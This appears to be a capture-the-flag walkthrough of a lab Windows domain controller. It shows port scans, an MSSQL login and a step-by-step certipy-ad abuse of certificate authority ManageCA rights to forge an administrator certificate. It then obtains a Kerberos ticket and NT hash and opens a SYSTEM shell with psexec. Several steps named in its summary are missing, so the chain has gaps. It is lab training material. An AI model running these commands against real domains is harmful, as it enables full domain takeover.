This is a Windows 2019 server machine configured as domain controller running a MSSQL database. Using enabled guest sessions on SMB shared resource, we can bruteforce the RID and get a list of domain users, then bruteforce credentials for the MSSQL database. In the database, xp_dirtree is used to locate a backup of the database which contains credentials for a WinRM shell. Regarding escalation, a misconfiguration on the manage CA permissions can be abused with certipy-ad to create a new certificate for an administrator user.
KEYWORDS
RID bruteforce, MSSQL directory traversal, xp_dirtree, manageCA, certipy-ad, pass the certificate, pass the ticket.
> nmap $target -p- -T4 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-21 16:51 EDT
Nmap scan report for manager.htb (10.129.142.151)
Host is up, received user-set (0.32s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
1433/tcp open ms-sql-s syn-ack
3268/tcp open ldap syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
49667/tcp open unknown syn-ack
49677/tcp open unknown syn-ack
49678/tcp open unknown syn-ack
49679/tcp open unknown syn-ack
50489/tcp open unknown syn-ack
50568/tcp open unknown syn-ack
65495/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up) scanned in 1379.15 seconds
Enumerate the open ports.
> nmap $target -p53,80,88,135,139,389,445,464,593,636,1433,3268,5985,9389 -sV -sC -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-21 17:29 EDT
Nmap scan report for manager.htb (10.129.142.151)
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-22 04:33:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-22T04:34:13+00:00; +7h03m31s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-22T04:34:12+00:00; +7h03m30s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-20T17:45:32
|_Not valid after: 2053-10-20T17:45:32
|_ssl-date: 2023-10-22T04:34:13+00:00; +7h03m31s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-22T04:34:13+00:00; +7h03m31s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h03m30s, deviation: 1s, median: 7h03m30s
| smb2-time:
| date: 2023-10-22T04:33:32
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Nmap done: 1 IP address (1 host up) scanned in 55.72 seconds
SMB enumeration.
> smbmap -H <target ip> -u guest
[+] IP: 10.129.142.151:445 Name: manager.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
The SMB share allows guest sessions; however, there are no shared folders available.
Attack is successful for credentials operator:operator
Log in with credentials and start enumerating the database.
> python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py manager.htb/operator:operator@10.129.142.151 -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
> SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
> SQL> enable_xp_cmdshell
[-] ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
It seems xp_cmdshell is not enabled and we don't have permissions to activate, therefore this way is closed. We will try to capture the NTLMv2 hash with responder or smbserver.py + xp_dirtree
First step is to grant yourself the Manage Certificates access right by adding your user as a new officer with certipy-ad tool.
> /usr/bin/certipy-ad ca -ca 'manager-DC01-CA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.142.151 -add-officer raven
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
The SubCA template can be enabled on the CA with the -enable-template flag. By default, the SubCA template is enabled.
> /usr/bin/certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
No we request a certificate based on the SubCA template. This request will be denied, but we will save the private key and note down the request ID. Make sure you are running the command from a directory where you have writing rights, otherwise the .key will not be written.
> /usr/bin/certipy-ad req -ca 'manager-DC01-CA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 21
Would you like to save the private key? (y/N) y
[*] Saved private key to 21.key
[-] Failed to request certificate# we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter
> /usr/bin/certipy-ad ca -ca 'manager-DC01-CA' -issue-request 21 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
[*] Successfully issued certificate
In this case, private key is saved as 21.key. Next, retrieve the issued certificate with the req command and the -retrieve <request ID> flag.
> /usr/bin/certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target manager.htb -retrieve 21
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 21
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '21.key'
[*] Saved certificate and private key to 'administrator.pfx'
In order for this to work, synchronization with DC clock is needed to avoid clock skew too great. This can be done with ntpdate
> sudo ntpdate -u 10.129.142.151
2023-10-22 16:28:37.84492 (-0400) +25184.364655 +/- 0.061746 10.129.142.151 s1 no-leap
CLOCK: time stepped by 25184.364655
Now, using the administrator certificate that we have just created, we generate a Kerberos TGT ticket.
> /usr/bin/certipy-ad auth -pfx ./administrator.pfx -dc-ip 10.129.142.151 -username administrator -domain manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
At this point, you can have a full interactive system shell by either passing the administrator hash or passing the TGT ticket.
To pass the hash, you can use psexec or similar tool. To pass the ticket, first export the ticket to prepare the attack.
> export KRB5CCNAME=administrator.ccache
Then login into the DC passing the TGT ticket.
> python3 /usr/share/doc/python3-impacket/examples/psexec.py manager.htb/administrator@dc01 -k -no-pass -dc-ip 10.129.142.151 -target-ip 10.129.142.151
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.142.151.....
[*] Found writable share ADMIN$
[*] Uploading file pxXDoAzA.exe
[*] Opening SVCManager on 10.129.142.151.....
[*] Creating service CRFB on 10.129.142.151.....
[*] Starting service CRFB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4974]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 566E-8ECA
Directory of c:\Users\Administrator\Desktop
09/28/2023 02:27 PM <DIR> .
09/28/2023 02:27 PM <DIR> ..
10/20/2023 10:46 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,414,751,744 bytes free
Final note: for some reason the DC clock gets unskewed very easily, for this reason the commands after the ntpdate have to be issued very quickly to avoid clocks get unsynchronized. Have them typed elsewhere to quickly copy-paste them.
